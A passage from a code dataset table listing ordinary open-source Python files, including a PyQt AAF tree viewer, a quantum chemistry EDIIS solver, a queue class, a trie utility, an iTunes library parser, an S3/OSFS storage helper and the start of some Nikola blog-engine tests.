code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
import sys
from PyQt4 import QtCore
import pyaaf
class DummyItem(object):
def __init__(self,item, name):
self.item = item
self.name = name
def GetName(self):
return self.name
def GetClassName(self):
return ""
class TreeItem(object):
def __init__(self, item, parent=None):
self.parentItem = parent
self.item = item
self.childItems = []
self.properties = {}
self.loaded = False
#self.getData()
def columnCount(self):
return 1
def childCount(self):
self.setup()
return len(self.childItems)
def child(self,row):
self.setup()
return self.childItems[row]
def childNumber(self):
self.setup()
if self.parentItem != None:
return self.parentItem.childItems.index(self)
return 0
def parent(self):
self.setup()
return self.parentItem
def extendChildItems(self, items):
self.childItems.extend([TreeItem(i,self) for i in items])
def name(self):
item = self.item
if isinstance(item, pyaaf.AxSourceClip):
try:
ref = item.ResolveRef()
return ref.GetName()
except:
return self.className()
elif isinstance(item,pyaaf.AxOperationGroup):
return item.GetOperationDef().GetName()
elif hasattr(item,"GetName"):
try:
return item.GetName() or self.className()
except:
print "cannot GetName of %s" % str(item)
return self.className()
else:
return self.className()
def className(self):
item = self.item
if hasattr(item,"GetClassName"):
return item.GetClassName()
else:
return item.__class__.__name__.replace("Ax","")
def setup(self):
if self.loaded:
return
item = self.item
if isinstance(item, list):
self.extendChildItems(item)
elif isinstance(item, pyaaf.AxFile):
self.extendChildItems([item.GetHeader()])
elif isinstance(item, pyaaf.AxHeader):
self.extendChildItems([item.GetContentStorage()])
self.extendChildItems([item.GetDictionary()])
elif isinstance(item, DummyItem):
self.extendChildItems(item.item)
elif isinstance(item, pyaaf.AxContentStorage):
l = []
l.append(DummyItem(list(item.GetCompositionMobs()),"CompositionMobs"))
l.append(DummyItem(list(item.GetMasterMobs()),"MasterMobs"))
l.append(DummyItem(list(item.GetSourceMobs()),"SourceMobs"))
self.extendChildItems(l)
elif isinstance(item, pyaaf.AxDictionary):
l = []
l.append(DummyItem(list(item.GetClassDefs()), 'ClassDefs'))
l.append(DummyItem(list(item.GetCodecDefs()), 'CodecDefs'))
l.append(DummyItem(list(item.GetContainerDefs()), 'ContainerDefs'))
l.append(DummyItem(list(item.GetDataDefs()), 'DataDefs'))
l.append(DummyItem(list(item.GetInterpolationDefs()), 'InterpolationDefs'))
l.append(DummyItem(list(item.GetKLVDataDefs()), 'KLVDataDefs'))
l.append(DummyItem(list(item.GetOperationDefs()), 'OperationDefs'))
l.append(DummyItem(list(item.GetParameterDefs()), 'ParameterDefs'))
l.append(DummyItem(list(item.GetPluginDefs()), 'PluginDefs'))
l.append(DummyItem(list(item.GetTaggedValueDefs()), 'TaggedValueDefs'))
l.append(DummyItem(list(item.GetTypeDefs()), 'TypeDefs'))
self.extendChildItems(l)
elif isinstance(item, (pyaaf.AxDefObject,pyaaf.AxMetaDefinition)):
pass
elif isinstance(item, pyaaf.AxMob):
self.extendChildItems(list(item.GetSlots()))
elif isinstance(item, pyaaf.AxMobSlot):
self.extendChildItems([item.GetSegment()])
elif isinstance(item, pyaaf.AxNestedScope):
self.extendChildItems(list(item.GetSegments()))
elif isinstance(item, pyaaf.AxSequence):
self.extendChildItems(list(item.GetComponents()))
elif isinstance(item, pyaaf.AxSourceClip):
pass
#self.extendChildItems([item.ResolveRef().GetName()])
#self.extendChildItems([item.GetSourceID()])
elif isinstance(item, pyaaf.AxTransition):
self.extendChildItems([item.GetOperationGroup()])
elif isinstance(item,pyaaf.AxOperationGroup):
input_segments = []
for i in xrange(item.CountSourceSegments()):
segment = item.GetInputSegmentAt(i)
input_segments.append(segment)
self.extendChildItems(input_segments)
elif isinstance(item, pyaaf.AxSelector):
self.extendChildItems(list(item.EnumAlternateSegments()))
elif isinstance(item, pyaaf.AxScopeReference):
#print item, item.GetRelativeScope(),item.GetRelativeSlot()
pass
elif isinstance(item, pyaaf.AxEssenceGroup):
segments = []
for i in xrange(item.CountChoices()):
choice = item.GetChoiceAt(i)
segments.append(choice)
self.extendChildItems(segments)
elif isinstance(item, pyaaf.AxProperty):
self.properties['Value'] = str(item.GetValue())
elif isinstance(item, pyaaf.AxComponent):
pass
else:
self.properties['Name'] = str(item)
self.properties['ClassName'] = str(type(item))
return
self.properties['Name'] = self.name()
self.properties['ClassName'] = self.className()
if isinstance(item, pyaaf.AxComponent):
try:
self.properties['Length'] = item.GetLength()
except:
pass
#print item
self.loaded = True
class AAFModel(QtCore.QAbstractItemModel):
def __init__(self, moblist,parent=None):
super(AAFModel,self).__init__(parent)
self.rootItem = TreeItem(moblist)
self.headers = ['Name','Length', 'ClassName']
def headerData(self, column, orientation,role):
if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
return QtCore.QVariant(self.headers[column])
return QtCore.QVariant()
def columnCount(self,index):
#item = self.getItem(index)
return len(self.headers)
def rowCount(self,parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
return parentItem.childCount()
def data(self, index, role):
if not index.isValid():
return 0
if role != QtCore.Qt.DisplayRole:
return None
item = self.getItem(index)
header_key = self.headers[index.column()]
return str(item.properties.get(header_key,''))
def parent(self, index):
if not index.isValid():
return QtCore.QModelIndex()
childItem = self.getItem(index)
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QtCore.QModelIndex()
return self.createIndex(parentItem.childNumber(), 0, parentItem)
def index(self, row, column, parent = QtCore.QModelIndex()):
if parent.isValid() and parent.column() != 0:
return QtCore.QModelIndex()
item = self.getItem(parent)
childItem = item.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QtCore.QModelIndex()
def getItem(self,index):
if index.isValid():
item = index.internalPointer()
if item:
return item
return self.rootItem
if __name__ == "__main__":
from PyQt4 import QtGui
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-c','--compmobs',action="store_true", default=False)
parser.add_option('-m','--mastermobs',action="store_true", default=False)
parser.add_option('-s','--sourcemobs',action="store_true", default=False)
parser.add_option('-d','--dictionary',action="store_true", default=False)
parser.add_option('-a','--all',action="store_true", default=False)
(options, args) = parser.parse_args()
if not args:
parser.error("not enough arguments")
file_path = args[0]
with pyaaf.open(file_path) as axfile:
#root = axfile
header = axfile.GetHeader()
storage = header.GetContentStorage()
root = storage
if options.compmobs:
root = list(storage.GetCompositionMobs())
if options.mastermobs:
root = list(storage.GetMasterMobs())
if options.sourcemobs:
root = list(storage.GetSourceMobs())
if options.dictionary:
root = header.GetDictionary()
if options.all:
root = axfile
#print mobs
app = QtGui.QApplication(sys.argv)
model = AAFModel(root)
tree = QtGui.QTreeView()
tree.setModel(model)
tree.resize(700,600)
#tree.expandToDepth(3)
tree.resizeColumnToContents(0)
tree.show()
sys.exit(app.exec_())
|
markreidvfx/pyaaf_old
|
examples/qt_aafmodel.py
|
Python
|
mit
| 10,046
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2015 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
#--
'''Energy DIIS SCF algorithm'''
import numpy as np
from horton.log import log
from horton.exceptions import NoSCFConvergence
from horton.meanfield.scf_diis import DIISHistory, DIISSCFSolver
from horton.quadprog import QPSolver
from horton.utils import doc_inherit
__all__ = ['EDIISSCFSolver']
class EDIISSCFSolver(DIISSCFSolver):
'''The Energy DIIS SCF solver [kudin2002]_'''
def __init__(self, threshold=1e-6, maxiter=128, nvector=6, skip_energy=False, prune_old_states=False):
'''
**Optional arguments:**
maxiter
The maximum number of iterations. When set to None, the SCF loop
will go one until convergence is reached.
threshold
The convergence threshold for the wavefunction
skip_energy
When set to True, the final energy is not computed. Note that some
DIIS variants need to compute the energy anyway. for these methods
this option is irrelevant.
prune_old_states
When set to True, old states are pruned from the history when their
coefficient is zero. Pruning starts at the oldest state and stops
as soon as a state is encountered with a non-zero coefficient. Even
if some newer states have a zero coefficient.
'''
log.cite('kudin2002', 'the EDIIS method.')
DIISSCFSolver.__init__(self, EDIISHistory, threshold, maxiter, nvector, skip_energy, prune_old_states)
class EDIISHistory(DIISHistory):
'''A Energy DIIS history object that keeps track of previous SCF solutions'''
name = 'EDIIS'
need_energy = True
def __init__(self, lf, nvector, ndm, deriv_scale, overlap):
'''
**Arguments:**
lf
The LinalgFactor used to create the two-index operators.
ndm
The number of density matrices (and fock matrices) in one
state.
deriv_scale
The deriv_scale attribute of the Effective Hamiltonian
overlap
The overlap matrix.
'''
# A matrix with dot products of all density and fock matrices
# Note that the dots matrix is not symmetric!
self.edots = np.empty((nvector, nvector))
self.edots.fill(np.nan)
DIISHistory.__init__(self, lf, nvector, ndm, deriv_scale, overlap, [self.edots])
def _complete_edots_matrix(self):
'''Complete the matrix of dot products between density and fock matrices
Even after multiple additions, this routine will fill up all the
missing dot products in self.edots.
'''
# This routine even works after multiple additions.
for i0 in xrange(self.nused-1, -1, -1):
if np.isfinite(self.edots[i0,i0]):
return
# Compute off-diagonal coefficients
state0 = self.stack[i0]
for i1 in xrange(i0+1):
state1 = self.stack[i1]
self.edots[i0,i1] = 0.0
for j in xrange(self.ndm):
self.edots[i0,i1] += state0.focks[j].contract_two('ab,ba', state1.dms[j])
if i0 != i1:
# Note that this matrix is not symmetric!
self.edots[i1,i0] = 0.0
for j in xrange(self.ndm):
self.edots[i1,i0] += state1.focks[j].contract_two('ab,ba', state0.dms[j])
def _setup_equations(self):
'''Compute the equations for the quadratic programming problem.'''
b = np.zeros((self.nused, self.nused), float)
e = np.zeros(self.nused, float)
for i0 in xrange(self.nused):
e[i0] = -self.stack[i0].energy
for i1 in xrange(i0+1):
b[i0, i1] = -0.5*self.deriv_scale*(self.edots[i0,i0] + self.edots[i1,i1] - self.edots[i0,i1] - self.edots[i1,i0])
if i0 != i1:
b[i1, i0] = b[i0, i1]
return b, e
@doc_inherit(DIISHistory)
def solve(self, dms_output, focks_output):
# interpolation only makes sense if there are two points
assert self.nused >= 2
# Fill in the missing commutators
self._complete_edots_matrix()
assert not np.isnan(self.edots[:self.nused,:self.nused]).any()
# Setup the equations
b, e = self._setup_equations()
# Check if solving these equations makes sense.
if b.max() - b.min() == 0 and e.max() - e.min() == 0:
raise NoSCFConvergence('Convergence criteria too tight for EDIIS')
# solve the quadratic programming problem
qps = QPSolver(b, e, np.ones((1,self.nused)), np.array([1.0]), eps=1e-6)
if self.nused < 10:
energy, coeffs = qps.find_brute()
guess = None
else:
guess = np.zeros(self.nused)
guess[e.argmax()] = 1.0
energy, coeffs = qps.find_local(guess, 1.0)
# for debugging purposes (negligible computational overhead)
try:
qps.check_solution(coeffs)
except:
qps.log(guess)
raise
cn = qps.compute_cn(coeffs != 0.0)
# assign extrapolated fock
error = self._build_combinations(coeffs, dms_output, focks_output)
return energy, coeffs, cn, 'E', error
|
eustislab/horton
|
horton/meanfield/scf_ediis.py
|
Python
|
gpl-3.0
| 6,201
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014-2018 Harrison Feng <feng.harrison@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Queue(object):
'''Queue
A queue, differently of a stack, is a structure where the first
enqueue element (at the back) will be the first one to be dequeued.
---> d ---> c ---> b ---> a ---->
in out
So a queue is also called FIFO (first in first out) structure.
'''
def __init__(self):
self._items = []
def is_empty(self):
'''Determine whether the queue is empty.'''
return not bool(self._items)
def enqueue(self, data):
'''Insert an item at the back of the queue.'''
self._items.insert(0, data)
def dequeue(self):
'''Remove an item from the front of the queue.'''
if self._items:
return self._items.pop()
else:
print("This queue is empty")
def size(self):
'''Return the size of the queue.'''
return len(self._items)
def peek(self):
if self._items:
return self._items[-1]
else:
print("This queue is empty")
|
harrisonfeng/py-algorithms
|
algorithms/py/adt/queues/queue.py
|
Python
|
apache-2.0
| 1,730
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Avencall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Plugin for Polycom phones using the 3.2.4.0267 SIP application.
The following Polycom phones are supported:
- SPIP320
- SPIP321
- SPIP330
- SPIP331
- SPIP335
- SPIP430
- SPIP450
- SPIP550
- SPIP560
- SPIP650
- SPIP670
- SSIP5000
- SSIP6000
- SSIP7000
- VVX1500
"""
# XXX version for VVX1500 is 3.2.4.0244, not 3.2.4.0267.
common_globals = {}
execfile_('common.py', common_globals)
MODELS = [u'SPIP320', u'SPIP321', u'SPIP330', u'SPIP331', u'SPIP335', u'SPIP430',
u'SPIP450', u'SPIP550', u'SPIP560', u'SPIP650', u'SPIP670', u'SSIP5000',
u'SSIP6000', u'SSIP7000', u'VVX1500']
VERSION = u'3.2.4.0267'
class PolycomPlugin(common_globals['BasePolycomPlugin']):
IS_PLUGIN = True
pg_associator = common_globals['BasePolycomPgAssociator'](MODELS, VERSION)
|
alexis-via/xivo-provd-plugins
|
plugins/xivo-polycom/3.2.4B/entry.py
|
Python
|
gpl-3.0
| 1,483
|
#!/bin/env python2
"""
Support functions for multibyte mnemonic encodings of
unicode characters.
$Id$
"""
def index(str): return str[0]
class Trie:
'''Represents r: string ++> value'''
def __init__(self):
'''ensures r := {}'''
self.subtries = {}
self.value = None
def add(self, str, value=None):
"""
r (+):= { str |-> value }
"""
if str:
key = index(str)
if not self.subtries.has_key(key): self.subtries[key] = Trie()
self.subtries[key].add(str[1:], value)
else:
self.value = value
def value(self, str):
"""
returns r[str]
"""
if str:
key = index(str)
if not self.subtries.has_key(key): return None
return self.subtries[key].value(str[1:])
else:
return self.value
def printOn(self, stream, ind=0):
"""
Print a multiline representation of the mapping
"""
for k in self.subtries.keys():
stream.write("%s%s"%(ind*'| ', `k`))
subtree = self.subtries[k]
if subtree.value:
stream.write(" = %s"%(`subtree.value`))
stream.write("\n")
subtree.printOn(stream, ind+1)
def __repr__(self):
if self.subtries:
buf = " ("
for k in self.subtries.keys():
buf += `k`
subtree = self.subtries[k]
if subtree.value: buf += (" "+`subtree.value`)
subtrierep = self.subtries[k].__repr__()
buf += subtrierep
if subtrierep and subtrierep[-1]==')': buf += " "
return buf + ")"
else:
return ""
def __str__(self): return self.__repr__()
class Cursor:
"""
Represents the state of an automaton that is ``desugaring''
an input stream by replacing occurences of domain elements of
a trie by the corresponding range elements. Ambiguities in
are resolved by translating the maximal-left-substring in the
domain.
"""
def __init__(self, trie):
self.start = trie # original trie
self.node = trie # current location
self.value = None # last value
self.buf = "" # characters read since last output
def move(self, ch):
"""
Consume a character:
Returns:
None, nothing to output
(None, buf) buf to output -- consumed no sugar since last output
(val, buf) buf to output -- consumed sugar for val since last output
"""
key = ch
if self.node.value:
self.value = self.node.value
self.buf = ""
if self.node.subtries.has_key(key):
self.node = self.node.subtries[key]
self.buf += ch
return None
elif self.value:
val = self.value
buf = self.buf+ch
self.value = None
self.buf = ""
self.node = self.start
return (val, buf)
else:
buf = self.buf+ch
self.buf = ""
self.node = self.start
return (None, buf)
if __name__ == '__main__':
import sys
err = 0
t = Trie()
t.add('->', r"""\arrow""")
t.add('+>', r"""\pfun""")
t.add('>=', r"""\geq""")
t.add('->>', r"""\surjection""")
t.add('+>>', r"""\partialsurjection""")
t.add('++>', r"""\fmap""")
t.add('++', r"""\cat""")
t.add('foo', r"""\fu""")
t.add('bar', r"""\bar""")
t.add('fooobar', r"""\fubar""")
t.printOn(sys.stderr)
print t
c = Cursor(t)
sys.stdout.write(":: ")
sys.stdout.flush()
line = sys.stdin.readline()
while line:
buf = ""
for ch in line:
v = c.move(ch)
if v:
r, k = v
if r: buf += "{"+r+"}"
buf += k
sys.stdout.write(buf)
sys.stdout.flush()
sys.stdout.write(":: ")
sys.stdout.flush()
line = sys.stdin.readline()
|
RBornat/jape
|
dev/Unicode/trie.py
|
Python
|
gpl-2.0
| 4,401
|
# app.py or app/__init__.py
from flask import Flask
app = Flask(__name__, instance_relative_config=True)
# Load the default configuration
app.config.from_object('config.default')
# Load the configuration from the instance folder
app.config.from_pyfile('config.py')
# Load the file specified by the APP_CONFIG_FILE environment variable
# Variables defined here will override those in the default configuration
app.config.from_envvar('APP_CONFIG_FILE')
# Now we can access the configuration variables via app.config["VAR_NAME"].
|
noll-scpls/hybrid
|
__init__.py
|
Python
|
gpl-3.0
| 533
|
import logging
import urllib
from os.path import isfile
import numpy as np
import pandas as pd
from tqdm import tqdm
from blessings import Terminal
from organiser import tm_utils
TERM = Terminal()
log = logging.getLogger(__name__)
def extract_record(record, fields):
extracted = dict()
for field in fields:
extracted[field] = record[field] if field in record else np.nan
return extracted
# TODO: Add a __str__ method
class ITunesSongs(object):
def __init__(self, song_list):
# What fields do we want to extract
self.extract_fields = (
"Track ID", # the Database ID, also represented by the "key"
"Genre",
"Year",
"Album",
"Grouping",
"Comments",
"Release Date",
"BPM",
"Composer",
"Total Time",
"Start Time",
"Stop Time",
)
self.songs = song_list.copy()
self.keys = [int(key) for key in self.songs.keys()]
self.df = None # Where we will hold the pandas dataframe with the songs
self._clean_songs()
self._get_dataframe()
def __iter__(self):
return self._iter_songs()
@staticmethod
def get_fname(record):
"""Print the location of an iTunes record:
fname = iTunes.get_fname(record)
"""
fname = record.get("Location") or ""
fname = fname.replace("file://", "")
fname = urllib.parse.unquote(fname)
return fname
def _get_dataframe(self):
song_dict = dict()
for key, record in self:
filename = self.get_fname(record)
artist = record["Artist"].split(" - ") if "Artist" in record else [""]
artist.reverse()
# Run unidecode, remove punctuation, double spaces and lower on the titles
if "Name" in record:
title = record["Name"]
title_clean = tm_utils.clean_string(record["Name"])
else:
title = np.nan
title_clean = np.nan
# Rating (ignore computed ratings)
rating = record["Rating"] if "Rating" in record else 0
if "Rating Computed" in record and record["Rating Computed"] is True:
rating = 0
if "Total Time" in record:
record_dict = {
"Filename": filename,
"Title": title,
"Title Clean": title_clean,
"Director": artist.pop(),
"Singers": "" if not artist else artist.pop(),
"Rating": rating,
"Loved": 1
if record.get("Loved")
else -1
if record.get("Disliked")
else 0,
}
record_dict.update(extract_record(record, self.extract_fields))
song_dict[key] = record_dict
# Convert set of dictionaries to dataframe and save
self.df = pd.DataFrame(song_dict).T
def _iter_songs(self):
for key in tqdm(self.keys):
record = self.songs[str(key)]
yield key, record
def _clean_songs(self):
log.info(TERM.green("Cleaning iTunes"))
for key, record in self._iter_songs():
fname = self.get_fname(record)
if "Podcast" in record or "Audiobook" in record:
del self.songs[str(key)]
elif "Genre" in record and record["Genre"] in ["Voice", "Voice Memo"]:
del self.songs[str(key)]
elif not isfile(fname):
del self.songs[str(key)]
elif fname.lower().endswith((".ipa", ".aif", ".aiff", ".wav")):
del self.songs[str(key)]
self.keys = [int(key) for key in self.songs.keys()]
|
alexvicegrab/tango_master
|
itunes/itunes_songs.py
|
Python
|
gpl-3.0
| 3,869
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2016, 2017, 2018 Guenter Bartsch
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
DEPENDS = [ 'base', 'dialog' ]
import sports
def get_data(k):
sports.get_data(k)
|
gooofy/voxforge
|
zamiaai/skills/sports/__init__.py
|
Python
|
lgpl-3.0
| 735
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
from cairis.core.Borg import Borg
__author__ = 'Shamal Faily'
class ExceptionPanel(wx.Panel):
def __init__(self,parent,envName):
wx.Panel.__init__(self,parent,EXCEPTION_ID)
b = Borg()
self.dbProxy = b.dbProxy
self.theEnvironmentName = envName
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(WidgetFactory.buildTextSizer(self,'Name',(87,30),EXCEPTION_TEXTNAME_ID),0,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildRadioButtonSizer(self,'Type',(87,30),[(EXCEPTION_RADIOGOAL_ID,'Goal'),(EXCEPTION_RADIOREQUIREMENT_ID,'Requirement')]))
goalList = self.dbProxy.environmentGoals(self.theEnvironmentName)
mainSizer.Add(WidgetFactory.buildComboSizerList(self,'Values',(87,30),EXCEPTION_COMBOGOALS_ID,goalList),0,wx.EXPAND)
catList = ['Confidentiality Threat','Integrity Threat','Availability Threat','Accountability Threat','Anonymity Threat','Pseudonymity Threat','Unlinkability Threat','Unobservability Threat','Vulnerability','Duration','Frequency','Demands','Goal Support']
mainSizer.Add(WidgetFactory.buildComboSizerList(self,'Category',(87,30),EXCEPTION_COMBOCATEGORY_ID,catList),0,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildMLTextSizer(self,'Definition',(87,30),EXCEPTION_TEXTDEFINITION_ID),1,wx.EXPAND)
self.SetSizer(mainSizer)
wx.EVT_RADIOBUTTON(self,EXCEPTION_RADIOGOAL_ID,self.onGoalSelected)
wx.EVT_RADIOBUTTON(self,EXCEPTION_RADIOREQUIREMENT_ID,self.onRequirementSelected)
def onGoalSelected(self,evt):
goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
goals = self.dbProxy.environmentGoals(self.theEnvironmentName)
goalCtrl.SetItems(goals)
goalCtrl.SetValue('')
def onRequirementSelected(self,evt):
goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
goals = self.dbProxy.getDimensionNames('requirement')
goalCtrl.SetItems(goals)
goalCtrl.SetValue('')
def loadControls(self,stepEx):
nameCtrl = self.FindWindowById(EXCEPTION_TEXTNAME_ID)
nameCtrl.SetValue(stepEx[0])
goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
dimType = stepEx[1]
if (dimType == 'goal'):
typeCtrl = self.FindWindowById(EXCEPTION_RADIOGOAL_ID)
typeCtrl.SetValue(True)
else:
typeCtrl = self.FindWindowById(EXCEPTION_RADIOREQUIREMENT_ID)
typeCtrl.SetValue(True)
goals = self.dbProxy.getDimensionNames('requirement')
goalCtrl.SetItems(goals)
dimName = stepEx[2]
goalCtrl.SetValue(dimName)
exCat = stepEx[3]
catCtrl = self.FindWindowById(EXCEPTION_COMBOCATEGORY_ID)
catCtrl.SetValue(exCat)
exDef = stepEx[4]
defCtrl = self.FindWindowById(EXCEPTION_TEXTDEFINITION_ID)
defCtrl.SetValue(exDef)
|
nathanbjenx/cairis
|
cairis/gui/ExceptionPanel.py
|
Python
|
apache-2.0
| 3,544
|
from __future__ import division, print_function, absolute_import
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('linalg',parent_package,top_path)
config.add_subpackage(('isolve'))
config.add_subpackage(('dsolve'))
config.add_subpackage(('eigen'))
config.add_data_dir('tests')
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
lhilt/scipy
|
scipy/sparse/linalg/setup.py
|
Python
|
bsd-3-clause
| 525
|
import json
import os
import os.path
import types
from django.conf import settings
from models import FSExpirations
if settings.DJFS['type'] == 'osfs':
from fs.osfs import OSFS
elif settings.DJFS['type'] == 's3fs':
from fs.s3fs import S3FS
from boto.s3.connection import S3Connection
from boto.s3.key import Key
s3conn = S3Connection()
else:
raise AttributeError("Bad filesystem: "+str(settings.DJFS['type']))
def get_filesystem(namespace):
''' Returns a pyfilesystem for static module storage.
The file system will have two additional properties:
1) get_url: A way to get a URL for a static file download
2) expire: A way to expire files (so they are automatically destroyed)
'''
if settings.DJFS['type'] == 'osfs':
return get_osfs( namespace )
elif settings.DJFS['type'] == 's3fs':
return get_s3fs( namespace )
else:
raise AttributeError("Bad filesystem: "+str(settings.DJFS['type']))
def expire_objects():
''' Remove all obsolete objects from the file systems. Untested. '''
objects = sorted(FSExpirations.expired(), key=lambda x:x.module)
fs = None
module = None
for o in objects:
if module != o.module:
module = o.module
fs = get_filesystem(module)
if fs.exists(o.filename):
fs.remove(o.filename)
o.delete()
def patch_fs(fs, namespace, url_method):
''' Patch a filesystem object to add two methods:
get_url returns a URL for a resource stored on that filesystem. It takes two parameters:
filename: Which resource
timeout: How long that resource is available for
expire sets a timeout on how long the system should keep the resource. It takes four parameters:
filename: Which resource
seconds: How long we will keep it
days: (optional) More user-friendly if a while
expires: (optional) boolean; if set to False, we keep the resource forever.
Without calling this method, we provide no guarantees on how long resources will stick around.
'''
def expire(self, filename, seconds, days=0, expires = True):
''' Set the lifespan of a file on the filesystem.
filename: Name of file
expire: False means the file will never be removed
seconds and days give time to expiration.
'''
FSExpirations.create_expiration(namespace, filename, seconds, days=days, expires = expires)
fs.expire = types.MethodType(expire, fs)
fs.get_url = types.MethodType(url_method, fs)
return fs
def get_osfs(namespace):
''' Helper method to get_filesystem for a file system on disk '''
full_path = os.path.join(settings.DJFS['directory_root'], namespace)
if not os.path.exists(full_path):
os.makedirs(full_path)
osfs = OSFS(full_path)
osfs = patch_fs(osfs, namespace, lambda self, filename, timeout=0:os.path.join(settings.DJFS['url_root'], namespace, filename))
return osfs
def get_s3fs(namespace):
''' Helper method to get_filesystem for a file system on S3 '''
fullpath = namespace
if 'prefix' in settings.DJFS:
fullpath = os.path.join(settings.DJFS['prefix'], fullpath)
s3fs = S3FS(settings.DJFS['bucket'], fullpath)
def get_s3_url(self, filename, timeout=60):
global s3conn
try:
return s3conn.generate_s3_url(timeout, 'GET', bucket = settings.DJFS['bucket'], key = filename)
except: # If connection has timed out
s3conn = S3Connection()
return s3conn.generate_s3_url(timeout, 'GET', bucket = settings.DJFS['bucket'], key = filename)
s3fs = patch_fs(s3fs, namespace, get_s3_url)
return s3fs
|
edx/insights
|
src/edinsights/modulefs/modulefs.py
|
Python
|
agpl-3.0
| 3,765
|
# -*- coding: utf-8 -*-
import unittest
import mock
import os
import lxml.html
from nikola.post import get_meta
from nikola.utils import (
demote_headers, TranslatableSetting, get_crumbs, TemplateHookRegistry,
get_asset_path, get_theme_chain, get_translation_candidate)
from nikola.plugins.task.sitemap import get_base_path as sitemap_get_base_path
class dummy(object):
default_lang = 'en'
class GetMetaTest(unittest.TestCase):
def test_getting_metadata_from_content(self):
file_metadata = ".. title: Nikola needs more tests!\n"\
".. slug: write-tests-now\n"\
".. date: 2012/09/15 19:52:05\n"\
".. tags:\n"\
".. link:\n"\
".. description:\n"\
"Post content\n"
opener_mock = mock.mock_open(read_data=file_metadata)
post = dummy()
post.source_path = 'file_with_metadata'
post.metadata_path = 'file_with_metadata.meta'
with mock.patch('nikola.post.io.open', opener_mock, create=True):
meta, nsm = get_meta(post)
self.assertEqual('Nikola needs more tests!', meta['title'])
self.assertEqual('write-tests-now', meta['slug'])
self.assertEqual('2012/09/15 19:52:05', meta['date'])
self.assertFalse('tags' in meta)
self.assertFalse('link' in meta)
self.assertFalse('description' in meta)
self.assertTrue(nsm)
def test_get_title_from_fname(self):
file_metadata = ".. slug: write-tests-now\n"\
".. date: 2012/09/15 19:52:05\n"\
".. tags:\n"\
".. link:\n"\
".. description:\n"
opener_mock = mock.mock_open(read_data=file_metadata)
post = dummy()
post.source_path = 'file_with_metadata'
post.metadata_path = 'file_with_metadata.meta'
with mock.patch('nikola.post.io.open', opener_mock, create=True):
meta, nsm = get_meta(post, 'file_with_metadata')
self.assertEqual('file_with_metadata', meta['title'])
self.assertEqual('write-tests-now', meta['slug'])
self.assertEqual('2012/09/15 19:52:05', meta['date'])
self.assertFalse('tags' in meta)
self.assertFalse('link' in meta)
self.assertFalse('description' in meta)
self.assertTrue(nsm)
def test_use_filename_as_slug_fallback(self):
file_metadata = ".. title: Nikola needs more tests!\n"\
".. date: 2012/09/15 19:52:05\n"\
".. tags:\n"\
".. link:\n"\
".. description:\n\n"\
"Post content\n"
opener_mock = mock.mock_open(read_data=file_metadata)
post = dummy()
post.source_path = 'Slugify this'
post.metadata_path = 'Slugify this.meta'
with mock.patch('nikola.post.io.open', opener_mock, create=True):
meta, nsm = get_meta(post, 'Slugify this')
self.assertEqual('Nikola needs more tests!', meta['title'])
self.assertEqual('slugify-this', meta['slug'])
